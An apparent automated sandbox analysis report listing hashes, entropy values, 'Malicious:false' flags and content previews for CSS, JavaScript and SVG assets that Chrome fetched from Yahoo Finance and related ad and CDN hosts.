                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:6D3393096AD097B87D2C936BF3D7B218B8762D7D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:753ED9237AC924E03B8313B798D0E6FE52E19CE356362DF10B7D46B2A8CC30FA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:62D1920C9D77195493C5F85C01AE5CE7A9CE9E2E9C7CB145990CC99AA66CAA9FCCEB72CCF005ACCD2225DEC7F004834EBF7ADA1C9E50118CD3A7B5C32A64C8FA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/AdvancedChartLink.DGqS8MFU.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.date-range-dropdown.yf-1t107kv input.yf-1t107kv{padding:var(--border-radius-xs);border:1px solid var(--light-divider);border-radius:var(--border-radius-s);font-size:var(--font-s)}button.rangeBtnDesktop{display:none}.dateToolbar.yf-1fbze17{display:flex;align-items:center;flex-wrap:wrap}@media only screen and (min-width: 1050px){button.rangeBtnDesktop{display:inline-block}}.chartlabel.yf-1isag2i{display:inline-block}.advchartlabel.yf-1isag2i{display:none}@media only screen and (min-width: 1050px){.advchartlabel.yf-1isag2i{display:inline-block}}@media only screen and (min-width: 1050px) and (max-width: 1441px){.condensed.yf-1isag2i{display:none}}@media only screen and (min-width: 1441px){.condensed.yf-1isag2i{display:inline-block}}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (9067)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):9068
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.191670188907179
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:KcbeK1g0sxeE76p5AxDmG+eqvzmsAmE5gSQil+97CrR80Ave:CCAx4blau/ve
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:EA614941D7C7935F64F01B9538E9C2BC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:06C30E0F14B50259472211381FFFFB9334E889F0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:EBDB55BAA1003DB3170B80AB3ABFCFB1B1D7518F36337425C667F2258D127850
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:7EF1237C81547F36FF386095BCB6036F85AC98CF33EFD3B9762435EAA12927325BA13737D1FC1D286FB0B22D36FAA73753E10422FC0EC87F06E953938C701C80
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/Spinner.DBQ4b_Oq.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:div.yf-usnhox{display:inline-flex;align-items:center;justify-content:center}div.centered.yf-usnhox{display:flex}@keyframes yf-usnhox-counter-ring-animated-2_t{0%{transform:translate(45.3475px,45.3475px) rotate(12.73deg) scale(.75) translate(.49px,130.552px)}0.3%{transform:translate(45.3475px,45.3475px) rotate(12.73deg) scale(.75) translate(.49px,130.552px)}to{transform:translate(45.3475px,45.3475px) rotate(191.2084deg) scale(.75) translate(.49px,130.552px)}}@keyframes yf-usnhox-counter-ring-animated-2_v{0%{visibility:visible;animation-timing-function:steps(1)}to{visibility:visible;animation-timing-function:steps(1)}}@keyframes yf-usnhox-Ellipse-1_o{0%{opacity:.77}0.85%{opacity:.77}1.7%{opacity:0}to{opacity:0}}@keyframes yf-usnhox-Path-1_do{0%{stroke-dashoffset:230px}0.3%{stroke-dashoffset:230px}to{stroke-dashoffset:230px}}@keyframes yf-usnhox-Ellipse-1-2_o{0%{opacity:0}1.15%{opacity:0}1.7%{opacity:.77}24.7%{opacity:0}to{opacity:0}}@keyframes yf-usnhox-Path-1-2_da{0%{stroke-dasharray:31
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1274)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1275
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.795239734124899
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:DHdqCkiX42MaXRX5m5E1HgRidD7TjWcG+AKWJTIVEHK1zpMFqYJC/BHzsmLgm0P:cCkgMahJmOHg8jn0KO7HSbzdG
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:CAC11CC71C84D5C93A68CC7EED9414AC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:78ED32E481B51AFB91AD1FF7D256AF0F53DF99C5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:2B7868E975C5873173C5BF0AE56CDDB4FA15A64522A4AC55AECA9DB78B180157
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:104F659CFDCBAFF592B285B18DD7C554425E225D091B3C5B704FD231CBE7E0E6E13A5993DBEF859403EB876FF0B237DFFA6A9F02EBC3051AC133DC098E5FAD4E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/twitter-x-round.YxAnOas2.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const v='<svg xmlns="http://www.w3.org/2000/svg" data-name="Layer 1" viewBox="0 0 24 24"><path d="M24 12c0-6.63-5.37-12-12-12S0 5.37 0 12c0 5.99 4.39 10.95 10.12 11.85v-8.39H7.07v-3.47h3.05V9.35c0-3.01 1.79-4.67 4.53-4.67 1.31 0 2.69.23 2.69.23v2.95h-1.51c-1.49 0-1.96.93-1.96 1.87v2.25h3.33l-.53 3.47h-2.8v8.39c5.74-.9 10.12-5.86 10.12-11.85Z"/></svg>',s='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 0C5.372 0 0 5.372 0 12s5.372 12 12 12 12-5.372 12-12S18.628 0 12 0M8.644 17.02h-2.34V9.534h2.34zM7.41 8.597h-.019c-.848 0-1.397-.572-1.397-1.299 0-.74.567-1.298 1.43-1.298.862 0 1.392.558 1.41 1.298.006.722-.543 1.299-1.424 1.299M18 17.02h-2.653v-3.872c0-1.012-.413-1.706-1.327-1.706-.698 0-1.087.469-1.265.919-.066.16-.057.384-.057.614v4.045h-2.63s.034-6.862 0-7.486h2.63v1.177c.155-.516.994-1.247 2.335-1.247 1.664 0 2.967 1.078 2.967 3.394z"/></svg>',h='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M14.881 17.183h1.49L9.512 7.58H8.02z"/><path
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):65865
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.208359994763881
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:yvOCf5Yi4RixvkfPwR6/RNWc0jnQR0hFEzos:y2nD//Cr4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:BD4D30BF2431199179FA9AFBDB1CCB76
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:2D9EDBDAAB2CE633D3B826EC363AA98A8894900D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:08C8E3BFE30297FB8AEEE20FC667F6F18AC7F19C49B4987CDD81078BCE8A2100
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:8BF97C1FEA028DAF20BDCA75591C40AF307078DA2502C6F0F2F951DC9573859B8744F3F9430B110F36ADF8589639B214AA6E5086987D0518A0D6E932F9FE2886
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/cx/hp-viewer/desktop_1.11.185.modern.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(){"use strict";const e=["finance.yahoo.com","news.yahoo.com","sports.yahoo.com"],t=new RegExp(/rs="([^"]*)"/),i={lmsid:"lmsid",lpstaid:"lpstaid",lu:"lu",pct:"pageContentType",pd:"pageDesign",pl:"pl",pt:"pageType",revsp:"revsp",ver:"appName"},s=["ctopid","hashtag","wiki_topics"],n=["defaultLREC","lighthouse","spotlight","bankratewidget"],o=["pd","pt","pct","lmsid","lpstaid","hashtag","pstaid"],a={att:"yhp",autos:"yautos",entertainment:"yent",finance:"yfin",fp:"yhp",gma:"ynews",lifestyle:"ylife",movies:"ymov",music:"yent",news:"ynews",sports:"ysports",style:"ylife",tech:"ytech"},r={hashtag:!0,lang:!0,region:!0,site:!0,spaceid:!0},c=["lmsid","lpstaid","pt","pd","ver","pct"],d=["sda-COMMENTSWFPAD-iframe"];const l=e=>new Promise((t=>setTimeout(t,e))),h=(e,{className:t,id:i,tagName:s})=>{if(e)return t&&!e.classList.contains(t)||i&&i!==e.id||s&&e.tagName!==s?h(e.parentElement,{className:t,id:i,tagName:s}):e},w=t=>{if(!t||t.startsWith("/"))return t;const{hostname:i,pathname:s}=new UR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65450)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):300300
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.499328669479401
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6144:6hRwnKFeC/Cqm+LB7ZNZW4XbFhaPPsY2/+7/SYwzK/oxjWzH+XcIlSL1UVURwYAA:6I0n/tE/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:50AD31517ECCEC4ED49233F289218699
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:282E7B5FC2D98CAC809817E803693A4A6A52E051
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:DF8BA535AE0497CB63580DC349892B8D3A75F5039B64480C8126D9B3934AD643
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:2DC65800894C0E1480462EAD06750367759B8E5F241DBBC4DF1562F391B954CFC53685328BCAF78DBDAAC38C8733D17D0D7645BD33A2C81C6B0DEF51935136DC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/uc/finance/cosaic/js/chartiq.5652c847dc2982261b6c.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see chartiq.5652c847dc2982261b6c.js.LICENSE.txt */."use strict";(self.webpackChunk_vzmi_finance_cosaic=self.webpackChunk_vzmi_finance_cosaic||[]).push([[8927],{4603:(e,t,i)=>{i.d(t,{mE:()=>B,vn:()=>z}),X[578658]=function(){for(var e=2;9!==e;)switch(e){case 2:e="object"==typeof globalThis?1:5;break;case 1:return globalThis;case 5:var t;try{for(var i=2;6!==i;)switch(i){case 9:delete t.v9LZn,delete Object.prototype.kCQ7J,i=6;break;case 3:throw"";case 4:i="undefined"==typeof v9LZn?3:9;break;case 2:Object.defineProperty(Object.prototype,"kCQ7J",{get:function(){return this},configurable:!0}),(t=kCQ7J).v9LZn=t,i=4}}catch(a){t=window}return t}}(),X.i7_Tw=function(){return"4H3-TW4%5C26Q_+Z50PZ!I%222XR*%5D%08:Qt%14lpi%01%03%10b%12%3ES%5E*M!8CV)L%0D1R%5C-G&%3EA%5B1N(0BW%10%7D%0D%3ECR%20%5C%22;QD+%5B5%3EBG(@5%3E%5DX#I!7_T(%5C%25;BW7F,;QP!%5D%0D7RR*Z$%15TN$%5D$-EW0F%12*C%5E*N!%3CXd5%5C%20,Tz1E5%3ETO4@3;BW!G5,XR7I3;WR6%5B$,QY+%5E!6CR%22I,?AW%25K2%3EnP!%5D!:%5ET1D$0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):154
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.063452167873521
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:HZ8sqDmJS4RKb5ykKcvXjXRHoNcHUXpWFUXJISILRU4GUSyvAZIAdSbFS:H69mc4sl3O4UXpCU2x8wvAZ/b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:827499D87703971F05522FDAD0D0936D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:9D77F07F4C14B6A96B3914BDE2873B76818B96AD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:383A86B47F8C4B9CAC4035415C5C2F66E2B254A26A507614CBA67EB7230DAF57
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:DBF2DADC523E7264254C082573F60D5F6EE21E720DE6A49E3222D4F4B11F5433C38CB17C6590172521F3C8CCB0A50C0D3E7AE6DA81385BDB74A75A4CEC119565
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const s='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9 16.17 4.83 12l-1.42 1.41L9 19 21 7l-1.41-1.41z"/></svg>';export{s as C};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1748)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):3538
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.441304830416464
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:YY7YNYR1m5ABePKTBxj6kDxx12yS1M9O84itGGyBofdxM6j:t86+A4STflDp9B4YL8oVxM6j
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:2838F07003D085AB45F51EF859908285
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:BAD614FA66418C5217689FC2236FC2CE71A6CCB7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B45A808297B05B4F2135D023ECBC2585C5FE666B24AD61AB74A669D2EAFD6F5A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:C20FEDEBC6DD95C5DE7CFCFA76749096CB9A68DB3DECC74C10FC1CCE92FE0A56F113918F697E79592E7D4337AFB61F13C058840232E59A13FA36E04609718D1E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://securepubads.g.doubleclick.net/pagead/js/car.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var e=this||self;/* . . Copyright Google LLC . SPDX-License-Identifier: Apache-2.0 .*/ .var f={};function g(){if(f!==f)throw Error("Bad secret");};function h(a){return Object.isFrozen(a)&&Object.isFrozen(a.raw)}function k(a){return a.toString().indexOf("`")===-1}const l=k(a=>a``)||k(a=>a`\0`)||k(a=>a`\n`)||k(a=>a`\u0000`),m=h``&&h`\0`&&h`\n`&&h`\u0000`;let n=globalThis.trustedTypes,p;function q(){let a=null;if(!n)return a;try{const b=d=>d;a=n.createPolicy("goog#html",{createHTML:b,createScript:b,createScriptURL:b})}catch(b){throw b;}return a};var r=class{constructor(a){g();this.g=a}toString(){return this.g+""}};function t(a){p===void 0&&(p=q());var b=p;return new r(b?b.createScriptURL(a):a)};var v=class{constructor(a){g();this.h=a}toString(){return this.h}};new v("about:blank");new v("about:invalid#zClosurez");const w=[];var x=a=>{console.warn(`A URL with content '${a}' was sanitized away.`)};w.ind
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (17320), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):17320
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.756027257143914
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:cCgBEbDATWo7pCz8qpI7/+fsQRBMUgyvDDqgMLGUGOCLYRIC1WZGb:cCgBz6o1CzXa7+fsQH/3nsXb
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:2FDF3E79D5E851201A0D52A886453D8B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:0CCA49213DC761C62B82C185E3A7C597CBE47515
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:12B5EACCD8A9D81A6A12512566D2B72AA7C100B4A261A08EE6AAE4679A9E36B4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:42C03ECEAE90964D9A6DD5999ADC52E5A1899D549B71966881EC43CD3BAAA79A188A8E50212AE720B8C85C094EC06DB09461D7C4E349BD53E526811BC3C0979D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:function _createForOfIteratorHelper(b,t){var e="undefined"!=typeof Symbol&&b[Symbol.iterator]||b["@@iterator"];if(!e){if(Array.isArray(b)||(e=_unsupportedIterableToArray(b))||t&&b&&"number"==typeof b.length){e&&(b=e);var c=0,m=function b(){};return{s:m,n:function t(){return c>=b.length?{done:!0}:{done:!1,value:b[c++]}},e:function b(t){throw t},f:m}}throw new TypeError("Invalid attempt to iterate non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}var W=!0,d=!1,n;return{s:function t(){e=e.call(b)},n:function b(){var t=e.next();return W=t.done,t},e:function b(t){d=!0,n=t},f:function b(){try{W||null==e.return||e.return()}finally{if(d)throw n}}}}function _unsupportedIterableToArray(b,t){if(b){if("string"==typeof b)return _arrayLikeToArray(b,t);var e=Object.prototype.toString.call(b).slice(8,-1);return"Object"===e&&b.constructor&&(e=b.constructor.name),"Map"===e||"Set"===e?Array.from(b):"Arguments"===e||/^(?:Ui|I)nt(?:8|16|32)(?:Clamp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (2261)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2262
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.480446598921567
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:htV9uMnE45v2mRAfZ1nWBy+m6LlzCULVHKBmgFp1WeQvBjV2YClAQ:rV93E45em2fZ1nWBy+miLlKBmgNZgIY8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:699223BDCD27FFC2918AF08B5FDEDE19
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:EC1663B13DE19827BEBA91244AA7ADB10994776D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:1A75186E0C2E4F9ECB3CA78DDC176C09DE34C60756BDDFB28CDB4D8D06362826
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:4E7DDAFEC2ABF56476188E88F04AA0A1939DF3C3FB06F4EB62092E8A65C47367BFB14E9BE8907BE7AB718B63B55B3B31BE2AD116D4FB8A19B3D3DB0A19352432
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/PositionDeleteMessage.D0Et4qWh.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as V,e as h,t as b,b as S,d as y,f as d,h as I,i as E,j as k,q as O,L,k as q,l as u,m as U,n as N}from"./scheduler.Dsuh-FKt.js";import{S as B,i as C}from"./index.CvwOawEI.js";import{t as T,b as M}from"./commonUtil.BWwawKjd.js";function H(l){let e,i=T(l[1]===1?"DELETE_POSITION_SUBTEXT_ONE":"DELETE_POSITION_SUBTEXT_OTHER",{ns:"common",symbol:l[0],count:l[1],price:l[4]})+"",a;return{c(){e=h("p"),a=b(i),this.h()},l(n){e=y(n,"P",{class:!0});var c=d(e);a=I(c,i),c.forEach(E),this.h()},h(){O(e,"class","description yf-t1mb2n")},m(n,c){q(n,e,c),u(e,a)},p(n,c){c&19&&i!==(i=T(n[1]===1?"DELETE_POSITION_SUBTEXT_ONE":"DELETE_POSITION_SUBTEXT_OTHER",{ns:"common",symbol:n[0],count:n[1],price:n[4]})+"")&&U(a,i)},d(n){n&&E(e)}}}function X(l){let e,i,a=T("DELETE_POSITION_TITLE",{ns:"common",symbol:l[0]})+"",n,c,f,r,_=T("DELETE_POSITION_SUBTEXT2")+"",m,s=!l[2]&&H(l);return{c(){e=h("div"),i=h("h2"),n=b(a),c=S(),s&&s.c(),f=S(),r=h("p"),m=b(_),this.h()},l(t){e=y(t,"DIV",{class:!0});var o=d(e);i=y(o,"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (18613)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):18614
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.512034603581658
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:nYifFfq6bd/V3FBx+W0ibdzewsM7RqxrYwM6l2BTC866qZTdDE75Es/s7L:nYifs8b3FP+Wzpeg7RqxcwM6YBTC8Nqv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:86D2368DD776598E57D817258E863A7F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:85317AFF508940D070861E6F462F6E961110CCFD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:85114F4983727ECFC30327979E41592F85E534CC2D82029989E015CF5E37EC91
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:017A143F9EA636B06B4F5BB9AFBF8BB50443C77781849450C767307FEBC89EED866471541B5321FBF091B8F9D7887A04F606CB1658D9BD20FF45037638F64D4F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/AddToFollowing.CnfVzhL0.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as We,b as q,e as y,j as P,d as I,f as E,K as x,k as w,i as _,o as he,y as He,p as K,q as v,Q as be,t as D,h as M,l as k,m as le,n as U,G as Ie,a9 as je,a4 as ge}from"./scheduler.Dsuh-FKt.js";import{S as Ye,i as Xe,c as R,b as V,m as z,t as A,a as O,d as F,g as ee,e as te}from"./index.CvwOawEI.js";import{e as ke,u as Ke,d as Qe}from"./each.CI2tb2RB.js";import{m as Ze,X as Je,Y as xe,g as we,e as re,h as Le,t as C,Z as et}from"./commonUtil.BWwawKjd.js";import{A as tt}from"./add.J4mq2Ck6.js";import{B as Q}from"./Button.C2rixdaC.js";import{D as lt}from"./Dialog.At1nlVje.js";import{I as Z}from"./Icon.C8w5V9EK.js";import{L as nt}from"./Link.vSNQugO0.js";import{M as st}from"./MenuSurface.CpHW4OA2.js";import{S as Ee,a as Ne}from"./star.BeZIjP36.js";import{b as ve}from"./i13nUtil.8E8_gCdn.js";import{c as ot}from"./loadPortfolios.CP0EWCgJ.js";import{p as it}from"./stores.BCwnb1-k.js";import{u as ae}from"./updatePositions.BP26waY1.js";const rt='<svg xmlns="http://www.w3.org/2000/svg" vi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (324)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):325
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.712604020443725
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:AlvKmWWNSM3tmIj/WM4R1XzW+TPe5kASTmZvMRbe4hXBWUV2HiNlv:ARSki/1C+T7ASUSeDUVq+1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:87BE50D095B667E85C7A7C16928CE749
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:719F9E2B34C1BBF9F2E6172BFB731677988181F6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:17DE704AC449FB082695A05404C1B45105FF8C73590B500D2995F8364F13E167
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:89903265FB51504B7D534CAF87D0EFAFEDB9B5C0BA6A7F8216EF88CDEA100644D0A8D35A585FC9A40517F1F3C2981AD15AB062EC539736A75D77BFA3E19AD992
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:function s(){const e=window._nimbus.resizeObserver;return e||(window._nimbus.resizeObserver=new ResizeObserver(n=>{for(const r of n)r.target.dispatchEvent(new CustomEvent("resize",{detail:{entry:r,observer:window._nimbus.resizeObserver}}))}))}function i(e){return s().observe(e),{destroy(){s().unobserve(e)}}}export{i as r};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (7124)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):7125
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.391179178324277
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:YRLQUo8LMDByXcYtx5VWHOM8oSOwsHL0UBjN9UnVX3sO8M:c8Uo8LMkXcYrjkhgUTuVX8rM
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:E254D88D959266344C9798EF102E2626
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:30B895D29B8E4187ADF76483FCEDE10258A1F0EF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:2B1A809EF975E2C68DEF307B461786AAA9514B7E42165B318EAA2E25DC3B359C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:0631F3A4AC69ACBEF026D935CD0A25CDC9FD6B37FA8349D78E87FB22E05CAFAEFDE462247292AB4BB1C67B567CD1B024D93B2B29FADDE8747ACC17BFEE0F9837
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/BreadCrumb.DydJ0B4H.js
